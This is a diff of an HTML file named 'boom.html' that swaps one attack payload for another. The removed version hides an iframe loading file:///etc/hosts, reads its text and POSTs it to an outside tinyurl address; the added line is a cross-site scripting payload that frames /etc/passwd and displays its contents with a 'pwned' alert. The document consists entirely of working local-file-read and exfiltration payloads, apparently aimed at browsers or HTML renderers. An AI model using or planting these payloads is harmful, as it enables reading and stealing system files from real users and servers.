--- a/boom.html
+++ b/boom.html
@@ -1,20 +1,1 @@
-<iframe id="leaker" src="file:///etc/hosts" style="display:none;"></iframe>
-<textarea id="dump" style="display:none;"></textarea>
-
-<script>
-  setTimeout(() => {
-    try {
-      const iframe = document.getElementById("leaker");
-      const body = iframe.contentDocument.body;
-      const dump = document.getElementById("dump");
-      dump.value = body.innerText;
-
-      fetch("https://tinyurl.com/vvh5tkem/leak", {
-        method: "POST",
-        body: JSON.stringify({ content: dump.value }),
-      });
-    } catch (e) {
-      console.error("Leak failed:", e);
-    }
-  }, 3000); // wait for iframe to load
-</script>
+<br><BR><BR><BR><h1>pwn<br><iframe onload=j() src=\"/etc/passwd\">xssxsxxsxs</iframe><script type=\"text/javascript\">function j(){alert('pwned contents of /etc/passwd:\n\n '+frames[0].document.body.innerText)}</script>
